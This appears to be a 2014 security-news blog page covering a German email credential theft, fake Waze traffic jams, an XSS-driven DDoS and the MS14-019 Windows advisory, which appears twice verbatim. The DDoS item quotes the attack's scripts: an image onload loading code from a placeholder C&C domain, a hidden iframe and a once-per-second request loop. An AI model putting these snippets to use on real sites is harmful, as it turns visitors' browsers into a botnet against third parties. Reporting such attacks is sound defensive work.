Wednesday 9 April 2014

German authorities discovered 18 Million stolen Email accounts

German authorities have discovered 18 Million Email Passwords, this is probably the biggest Data Theft in the history of the country.
German authorities have confirmed that nearly 18 million email accounts were stolen and compromised by hackers, it is the greatest theft occurred in the country in the history.
The news was published by the Der Spiegel journal on Thursday, German Authorities revealed that unknown hackers run another mass hacking campaign against private citizens stealing their data and information from major Internet companies in the country.
The law enforcement discovered a list of about 18 million stolen email addresses and passwords, the incident has occurred just two months later from the previous major data breach that hit 16 million German, also in that case email credentials were exposed. 
German biggest data breach
Till now, there is no news regarding the massive data theft and there are no details on how criminals obtained a so large volume of information, experts believe that the extension of the data theft could be much largerThe data theft appears dated in the mid of January, journalists at Der Spiegel have hypothesized that behind both crimes there is the same criminal gang, they also suggested that hackers may be based in one of the Baltic countries.
As I explained many times in the past, every email account is a precious commodity in the hand of cyber criminals, they are used to send spam emails, to arrange phishing campaigns, or for online shopping.
Investigators sustain that the stolen emails may be also used to obtain the financial details of users’ accounts.
It is suspected that these stolen records are being actively misused,” said Lutz Gaebel, spokesman of the prosecutor’s office in Verden.
Following the disclosure of news the German authorities invited citizens to take additional security measures to protect their account and prevent that they could be used for illicit activities.
It has been estimated that at least three million of the accounts belonged to German citizens, the German prosecutor and the Federal Office for Information Security (BSI) are already working to help the Internet users with adoption of further security measures.

Israeli students can cause fake traffic jams on popular Waze map app

traffic jams 

Two Israeli students at Technion-Israel Institute of Technology were able to cause traffic jams hacking the popular navigation app Waze for a school project.

In many films we have seen bad hackers who were able to cause Traffic Jams causing death and destruction, this was possible because filmmakers are aware of the high penetration level in our ordinary life. Think to the paradigm of Internet of Things or the were able devices, humans are being nodes of a global network and who will control it will control the world.
Is it possible to cause traffic jams with a cyber attack? The reply is yes, it’s hard, but not impossible.
I desire to share with you this curious news, hackers can cause traffic jams just deceiving your navigation Smartphone application. It’s interesting to note that the attackers were able to cause traffic jams without interfering with any infrastructure neither hacking the traffic light systems.
Shir Yadid and Meital Ben-Sinai, two Israeli students at Technion-Israel Institute of Technology, demonstrated that it is possible hacking a popular navigation app.
The news was reported by the journal Haaretz, The two students were assigned by college to hack Google-owned Waze GPS app, it is a popular mobile application that provides indications and useful information on the status of the traffic, including alerts on traffic jams and accidents.
Waze-Social-GPS-Maps Traffic jams
Waze navigation app is widely used in Israel, recently Google acquired the firm for $1 billion.
The students created an application was able to introduce in the navigation application Waze information to case the reporting of fake traffic jams. Of course they used a demo simulator to launch the cyber attack, the experiment succeeded in demonstrating that a bad actor could cause traffic jams inoculating fake information in any similar app.
The strategy adopted by the students is quite simple, similar to the one I proposed years ago to poison social networks, they registered thousands of fake Waze users using bogus GPS coordinates.
The positions assigned to each fake profile are interpreted by the navigation application that when note a great number  of users in the same place trigger an alert for a traffic jam with obvious consequences. 

The attackers could deliberately raise the alerts for traffic jams in different areas of a city, causing the traffic direction to roads non so crawled, in reality the entire traffic will be hijacked in the same place causing the traffic congestions.
The students have already informed Waze of the attack, providing the results of the experiments to the Waze company.

One of World’s Largest Websites Hacked: Turns Visitors into “DDoS Zombies”

Persistent XSS Enables Large-Scale DDoS Attack

Incapsula firm discovered the exploitation of a persistent XSS vulnerability in one of the world most popular website to run a large scale DDoS attack \. The site in question is a high profile video content provider, which allows its users to sign in with their own profiles. The DDoS attack was enabled by a Persistent XSS vulnerability that allowed the offender to inject JavaScript code into the <img> tag associated with the profile image. As a result, every time the image was used on one of the the site’s pages (e.g., in the comment section), the malicious code was also embedded inside, waiting to be executed by every future visitor to that page.
One of World’s Largest Websites Hacked: Turns Visitors into DDoS Zombies
As a result, each time a legitimate visitor landed on that page, his browser automatically executed the injected JavaScript, which in turn injected a hidden <iframe> with the address of the DDoSer’s C&C domain. There, an Ajax-scripted DDoS tool hijacked the browser, forcing it to issue a DDoS request at a rate of one request per second.
Obviously one request per second is not a lot. However, when dealing with video content of 10, 20 and 30 minutes in length, and with thousands of views every minute, the attack can quickly become very large and extremely dangerous. Knowing this, the offender strategically posted comments on popular videos, effectively created a self-sustaining botnet comprising tens of thousands of hijacked browsers, operated by unsuspecting human visitors who were only there to watch a few funny cat videos.
// JavaScript Injection in &amp;lt;img&amp;gt; tag enabled by Persistent XSS 
&amp;lt;img src="/imagename.jpg" 
onload="$.getScript('http://c&amp;amp;cdomain.com/index.html')" /&amp;gt;

// Malicious JavaScript opens hidden &amp;lt;iframe&amp;gt;
function ddos(url) {
$("body").append("&amp;lt;iframe id='ifr11323' style='display:none;' 
src='http://c&amp;amp;cdomain.com/index.html'&amp;gt;&amp;lt;/iframe&amp;gt;");
}

//  Ajax DDoS tool in executes GET request every second
&amp;lt;html&amp;gt;&amp;lt;body&amp;gt; 
&amp;lt;h1&amp;gt;Iframe&amp;lt;/h1&amp;gt;
&amp;lt;script&amp;gt;    
ddos('http://www.target1.com/1.jpg',
    'http://www.target2.com/1.jpg');
function ddos(url,url2){
            window.setInterval(function (){
                $.getScript(url);
                $.getScript(url2);
                        },1000)
        }
&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
Malicious scripts used in the attack.

Intercepting the Attack

The attack was blocked by Incapsula’s progressive challenges and behavior-based security algorithms, made that much more effective by the predictable behavior of the DDoS tool. By intercepting the malicious requests, they were also able to track the source of the attack
. "We did this by replacing the content of the target URL with a snippet of our own JavaScript, which reported the original referral source – leading us to the abused video website" Incapsula revealed.

"We were then able to replicate the Persistent XSS responsible for the attack. Once we had all of this information in hand, we quickly reached out to the site support team, offering our help in fixing the issue.
It should be noted that  the original DDoS tool on the attacker’s C&C domain was replaced with a much more robust version. This leads us to believe that the previous version was a sort of POC test run. The current code is not only much more sophisticated, but it is also built for keeping track of the attack, for what seems like billing purposes. From the looks of it, someone is now using this Alexa Top 50 website to set up a chain of botnets for hire."

Windows Vulnerability: binary hijacking via .cmd or .bat file


A remote code execution vulnerability exists in the way that Microsoft Windows processes .bat and .cmd files that are run from an external network.(MS14-019)

The vulnerability could allow remote code execution if a user runs specially crafted .bat and .cmd files from a trusted or semi-trusted network location. An attacker would have no way to force users to visit the network location or run the specially crafted files. Instead, an attacker would have to convince users to take such action.

For example, an attacker could trick users into clicking a link that takes them to the location of the attacker's specially crafted files and subsequently convince them to run them.

It is possible to hijack the cmd.exe with a copy present in the attacker controlled current working directory (CWD) of an affected application.

Command (.cmd) and batch (.bat) files can be directly provided as input to the CreateProcess as if it is an executable. CreateProcess uses the cmd.exe automatically to run the input .cmd or .bat.

An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Vulnerable Systems:

Microsoft Windows XP Service Pack 3 0
Microsoft Windows XP Professional x64 Edition SP2
Microsoft Windows Vista Service Pack 2 0
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2003 Itanium SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 7 for 32-bit Systems SP1
A remote code execution vulnerability exists in the way that Microsoft Windows processes .bat and .cmd files that are run from an external network.(MS14-019)
The vulnerability could allow remote code execution if a user runs specially crafted .bat and .cmd files from a trusted or semi-trusted network location. An attacker would have no way to force users to visit the network location or run the specially crafted files. Instead, an attacker would have to convince users to take such action.
For example, an attacker could trick users into clicking a link that takes them to the location of the attacker's specially crafted files and subsequently convince them to run them.
It is possible to hijack the cmd.exe with a copy present in the attacker controlled current working directory (CWD) of an affected application.
Command (.cmd) and batch (.bat) files can be directly provided as input to the CreateProcess as if it is an executable. CreateProcess uses the cmd.exe automatically to run the input .cmd or .bat.
An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
Vulnerable Systems:
Microsoft Windows XP Service Pack 3 0
Microsoft Windows XP Professional x64 Edition SP2
Microsoft Windows Vista Service Pack 2 0
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2003 Itanium SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 7 for 32-bit Systems SP1
- See more at: http://www.cyberwarzone.com/windows-vulnerability-binary-hijacking-cmd-or-bat-file#sthash.0hnSE5KV.dpuf